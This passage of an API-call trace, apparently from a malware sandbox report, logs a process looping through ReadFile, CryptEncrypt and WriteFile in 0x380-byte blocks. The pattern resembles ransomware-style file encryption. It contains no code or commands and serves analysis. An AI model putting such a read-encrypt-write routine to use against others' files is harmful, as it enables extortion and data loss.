lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.123] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.123] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.123] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.124] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.124] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.124] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.124] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.124] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.124] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.124] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.125] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.125] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.126] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.126] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.126] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.127] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.127] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.128] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.128] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.130] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.130] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.131] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.131] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.131] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.131] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.131] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.132] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.132] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.132] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.132] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.142] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.142] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 